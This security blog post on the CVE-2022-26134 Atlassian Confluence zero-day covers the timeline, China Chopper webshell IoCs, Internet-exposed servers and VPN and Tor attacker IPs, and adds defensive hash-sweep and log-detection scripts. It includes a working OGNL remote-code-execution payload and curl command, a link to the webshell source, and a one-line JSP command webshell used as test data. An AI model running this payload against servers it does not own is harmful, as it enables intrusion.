According to Volexity 1), a cybersecurity company in Washington, DC, a webshell was discovered on an Atlassian Confluence server during an incident response investigation. Volexity initially treated it as a Confluence-related issue and developed proof-of-concept exploit code. The company later determined that it was a zero-day vulnerability that allowed remote code execution even on a server with the latest patch applied, and reported the issue to Atlassian (May 31, PDT).

After receiving the report and confirming it as a zero-day vulnerability, Atlassian issued a security advisory for the critical unauthenticated remote code execution (June 3, PDT). Volexity has also published a blog post and a tweet.

1) Volexity's CTO Michael Hale Ligh is one of the authors of the world-famous cybersecurity book, Malware Analyst's Cookbook.
Volexity's updated tweet about Atlassian Confluence Zero-day Exploitation

Timeline of zero-day vulnerability in Atlassian Confluence

  • May 31: Volexity found the zero-day vulnerability in Atlassian Confluence.
  • Jun 2, 1 p.m.: Atlassian and Volexity officially issued a security advisory for the CVE-2022-26134 vulnerability.
  • June 3, 8 a.m.: Atlassian published a mitigation for the vulnerability that does not require a security patch.
  • June 3, 8 p.m.: Atlassian released security updates that address the vulnerability.

(All times are PDT.)

Webshell that was also used for MS Exchange Server attacks

According to Volexity's analysis report, an attacker can exploit CVE-2022-26134 to upload a webshell, in particular the China Chopper webshell. China Chopper is a notorious webshell that was also used during the recent Microsoft Exchange Server crisis. If the attacker penetrates the server and uploads this webshell, believed to be created by the Chinese hacking group Hafnium, the attacker retains free access to the server even after the zero-day security patch has been applied.

GitHub link to the China Chopper webshell (JSP variant):
https://github.com/tennc/webshell/blob/master/caidao-shell/%E8%8F%9C%E5%88%80jsp%E4%BF%AE%E6%94%B9.jsp

Other webshell hashes:
md5: ea18fb65d92e1f0671f23372gf60e7
sha1: 80b327ec19c7d14cc10511060ed3a4abffc821af

VirusTotal report:
https://www.virustotal.com/gui/file/5f3d46a5d18c25c7ee63f6bbe9af930d3be44f541625363a029f23de25cd36ae

MITRE ATT&CK entry for China Chopper:
https://attack.mitre.org/software/S0020
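The post says a webshell can survive the patch, so a defender's first job after patching is to sweep the Confluence installation for it. The Python script below is an added example and is not code from the page, from Volexity or from Criminal IP. It hashes every file under a directory and compares the digests with the SHA-1 listed above and the SHA-256 embedded in the VirusTotal link (the md5 on the page is not a valid hexadecimal digest, so it is left out), and it applies a content heuristic that is my own assumption rather than a published signature: a JSP file that feeds a request parameter into Runtime.exec or ProcessBuilder. The directory layout and file contents created by build_sample_tree are constructed for the demonstration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Digests published on the page for the webshell sample: the sha1 from the IoC
# list and the sha256 that appears in the VirusTotal URL.
KNOWN_BAD_SHA1 = {"80b327ec19c7d14cc10511060ed3a4abffc821af"}
KNOWN_BAD_SHA256 = {"5f3d46a5d18c25c7ee63f6bbe9af930d3be44f541625363a029f23de25cd36ae"}

# Heuristic (an assumption, not from the page): a JSP that both reads a request
# parameter and spawns a process is typical of a small command webshell.
EXEC_MARKER = re.compile(rb"Runtime\.getRuntime\(\)\s*\.\s*exec\s*\(|new\s+ProcessBuilder\s*\(")
PARAM_MARKER = re.compile(rb"request\.getParameter\s*\(")


def hash_file(path):
    """Return (sha1, sha256) hex digests of a file, streaming it in 64 KiB chunks."""
    sha1, sha256 = hashlib.sha1(), hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            sha1.update(chunk)
            sha256.update(chunk)
    return sha1.hexdigest(), sha256.hexdigest()


def sweep(root, bad_sha1=KNOWN_BAD_SHA1, bad_sha256=KNOWN_BAD_SHA256):
    """Walk an install directory; return sorted (relative path, reason) findings."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        s1, s256 = hash_file(path)
        if s1 in bad_sha1 or s256 in bad_sha256:
            findings.append((rel, "hash matches known webshell IoC"))
            continue
        if path.suffix.lower() in (".jsp", ".jspx"):
            data = path.read_bytes()
            if EXEC_MARKER.search(data) and PARAM_MARKER.search(data):
                findings.append((rel, "JSP passes a request parameter to a process-execution call"))
    return sorted(findings)


def build_sample_tree(root):
    """Create a constructed mini install tree: one benign JSP, one suspicious JSP, one text file."""
    root = Path(root)
    (root / "upload").mkdir(parents=True, exist_ok=True)
    (root / "pages").mkdir(parents=True, exist_ok=True)
    (root / "index.jsp").write_text('<%@ page contentType="text/html" %><html>Hello</html>')
    (root / "upload" / "helper.jsp").write_text(
        '<% Runtime.getRuntime().exec(request.getParameter("c")); %>'
    )
    (root / "pages" / "notes.txt").write_text("constructed sample file, not a real webshell")
    return root


def demo():
    """Run the sweep on the constructed tree; the notes file's own hash is added to the
    IoC set so the hash-match branch is exercised without any real malware on disk."""
    with tempfile.TemporaryDirectory() as tmp:
        root = build_sample_tree(tmp)
        s1, _ = hash_file(root / "pages" / "notes.txt")
        return sweep(root, bad_sha1=KNOWN_BAD_SHA1 | {s1})


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

In production you would point sweep() at the Confluence home and installation directories and review every hit by hand; a hash match is conclusive, while the JSP heuristic only prioritises files for inspection.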

Confluence servers still exposed to the Internet

Although the zero-day attack began during the Memorial Day holiday in the United States, Atlassian released security patches at a fairly rapid pace. The problem, however, is that many Confluence servers remain connected to the Internet. As with the Microsoft Exchange Server issue, servers that were left unattended for months after the patches were released are still reachable from the Internet without being patched.

AI Spera's CIP team used Criminal IP to determine how many Atlassian Confluence servers are connected to the Internet. In Element Analysis, the tech_stack: "Atlassian Confluence" filter shows country-by-country statistics of Confluence servers exposed to the Internet.

tech_stack: “Atlassian Confluence”

Statistics of more than 5,600 Confluence servers installed in over 70 countries searched by Element Analysis of Criminal IP

The screenshot above shows more than 5,600 Confluence servers installed in 70 countries and reachable on the Internet. When the CIP team checked individual IP addresses through Criminal IP's Asset Search, it found Confluence instances exposed to the Internet without any protection, as shown below.

Exposed Confluence Server Found by Criminal IP Asset Search

What makes this even more problematic is that many of these IP addresses belong to actual companies or institutions. Although the ASN names of most of these IP addresses point to cloud providers such as AWS, Microsoft Azure, and Google, that is simply because institutions and companies host Confluence on cloud servers; the HTML title shown in the dashboard below often reveals which company or organization owns the instance.

ASN of the exposed Confluence server discovered in Criminal IP

Since an organization typically runs only one or two Confluence servers rather than many, it is better to look first at ASN names that return only a few results when searching by ASN Name. For example, although only one result was found in each of the following cases, the ASN name is a university's own name, which points to a Confluence server installed in a school or a campus laboratory.

IP addresses of universities with Internet-exposed Confluence servers, retrieved from Criminal IP using the keyword "ASN Name"

In the following case, the Confluence of an American medical school was found on the Internet and, to make things worse, all of its content is open without login authentication.

The exposed Confluence of the U.S. Medical School searched by Criminal IP. The information is disclosed without login authentication.

Analysis of the Attacker's IP Addresses

According to the IoCs released by Volexity, 15 IP addresses were observed interacting with webshells on Confluence servers after the first Confluence attack. After analyzing these IP addresses with Criminal IP, the following five are identified as using VPN services. Attackers who carry out zero-day or APT attacks these days tend to use VPN services rather than IP addresses with a high malicious index. This creates a new security requirement: companies must detect VPN IP addresses among inbound traffic, as more attackers are expected to use VPNs to leave no trace when they pass through previously compromised servers.

Below are the IP addresses tagged as VPN in Criminal IP. In addition, one Tor exit IP address has been identified.

156.146.56.136 VPN
198.147.22.148 VPN
59.163.248.170 VPN
64.64.228.239 VPN
66.115.182.102 VPN
66.115.182.111 VPN

156.146.34.9 Tor

One IP address of the 15 Confluence zero-day exploit cases released by Volexity is detected as a VPN IP address on Criminal IP.

How to Check for Vulnerabilities

If you are a Confluence user with browser access to your Confluence server, you can send the following request with curl or a Python script to determine whether your server is vulnerable. Even if you are not an information security officer, this lets you check your company's Confluence. Try the following method and, if the server turns out to be vulnerable, immediately ask your security department to patch it:

https://your_confluence_address/${(#result=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(“id”).getInputStream(),”utf-8″)).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(“X-Cmd-Response”,#result))}/

After replacing your_confluence_address with your own server's address, you can check it with curl as follows. If the uid, gid, and groups of the Confluence server's account appear in the X-Cmd-Response header value, the server is vulnerable to CVE-2022-26134.

curl -v -k --head https://your_confluence_address/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ | grep X-Cmd-Response
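A defender who would rather not send the request above, or who needs to know whether anyone else already has, can look for the same request shape in the server's access logs. The Python script below is an added example and is not part of the original post: it parses Tomcat-style access log lines, URL-decodes the request path, flags the markers of the CVE-2022-26134 request shown above (an OGNL ${...} expression in the path, a Runtime.exec call inside it, and the ServletActionContext/setHeader trick used to return command output), and tags source addresses that appear in the VPN/Tor list from the previous section. The log lines and the 203.0.113.x and 10.0.0.x addresses are constructed for the example.

```python
import re
from urllib.parse import unquote

# Source IPs from the Criminal IP analysis of Volexity's IoCs, with their tags.
IOC_IPS = {
    "156.146.56.136": "VPN", "198.147.22.148": "VPN", "59.163.248.170": "VPN",
    "64.64.228.239": "VPN", "66.115.182.102": "VPN", "66.115.182.111": "VPN",
    "156.146.34.9": "Tor",
}

# Tomcat/Apache common-log prefix: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Markers of the request shape shown on the page, matched against the decoded path.
SIGNATURES = [
    ("ognl_expression_in_path", re.compile(r"\$\{")),
    ("runtime_exec_in_expression", re.compile(r"java\.lang\.Runtime|getRuntime\(\)|ProcessBuilder")),
    ("response_header_exfil", re.compile(r"ServletActionContext|setHeader\(")),
]


def decode_path(target):
    """Drop the query string and URL-decode repeatedly until the path stops changing."""
    path = target.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def analyze(lines):
    """Return one finding per request that looks like an exploit attempt or comes from an IoC IP."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        path = decode_path(m.group("target"))
        reasons = [name for name, rx in SIGNATURES if rx.search(path)]
        tag = IOC_IPS.get(m.group("ip"))
        if reasons or tag:
            findings.append({
                "ip": m.group("ip"), "ts": m.group("ts"), "status": int(m.group("status")),
                "path": path[:80], "reasons": reasons, "ip_tag": tag,
            })
    return findings


# The URL-encoded path from the curl command on the page, used here only as log data.
PAGE_PAYLOAD = (
    "/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime"
    "%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29."
    "%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader"
    "%28%22X-Cmd-Response%22%2C%23a%29%29%7D/"
)

# Constructed sample access log: benign traffic, two exploit attempts, one IoC-tagged visitor.
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Jun/2022:10:14:01 +0000] "GET /display/ENG/Home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    f'156.146.56.136 - - [02/Jun/2022:10:15:32 +0000] "GET {PAGE_PAYLOAD} HTTP/1.1" 302 0 "-" "curl/7.68.0"',
    f'203.0.113.7 - - [02/Jun/2022:11:02:10 +0000] "GET {PAGE_PAYLOAD} HTTP/1.1" 302 0 "-" "python-requests/2.27"',
    '156.146.34.9 - - [02/Jun/2022:11:40:55 +0000] "GET /login.action HTTP/1.1" 200 8801 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [02/Jun/2022:12:00:00 +0000] "GET /rest/api/content?title=Budget%20%24%7B2022%7D HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']:<16} tag={f['ip_tag']} status={f['status']} reasons={f['reasons']}")
```

The query-string case on the last sample line is deliberately left unflagged: the injection described on the page sits in the URI path, and restricting the signatures to the decoded path keeps ordinary page titles containing "${" out of the alert queue. A hit with a 302 status and the response-header marker deserves the same post-patch webshell sweep the article recommends, regardless of whether the source IP is on the list.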

On June 3rd, 2022, Atlassian released a patch for CVE-2022-26134. Some organizations, however, may find it burdensome to shut down servers for a security update, since Confluence is a wiki system many people rely on to share important information. For that case Atlassian also provides a manual workaround that addresses only this security issue; apply it in accordance with Atlassian's recommendations.

Vendors have responded to the zero-day attack by actively releasing security updates. Unlike many other vulnerability classes, however, a zero-day in a web-facing system can be attacked from outside immediately, with no complicated preconditions. Moreover, if a webshell backdoor has already been uploaded, additional security checks are required, because a path for the attacker to freely access the system remains even after the patch is applied.

Whenever such a zero-day remote code execution vulnerability appears, the same pattern of establishing a webshell backdoor follows. Webshell attacks like the Microsoft Exchange and Confluence incidents are expected to continue.

For reference, Confluence also suffered a zero-day attack last year. Confluence is a well-known system worldwide, and at the same time a major target of cyber attacks, because it is a server where important information from companies and institutions is gathered in one place, making it a tempting target for hackers. Therefore, the first thing companies and organizations that use Confluence should do is immediately block external access to their Confluence server. In addition, periodic monitoring and inspection of the attack surface should be performed so that such critical information management systems are not exposed externally.

Source: Criminal IP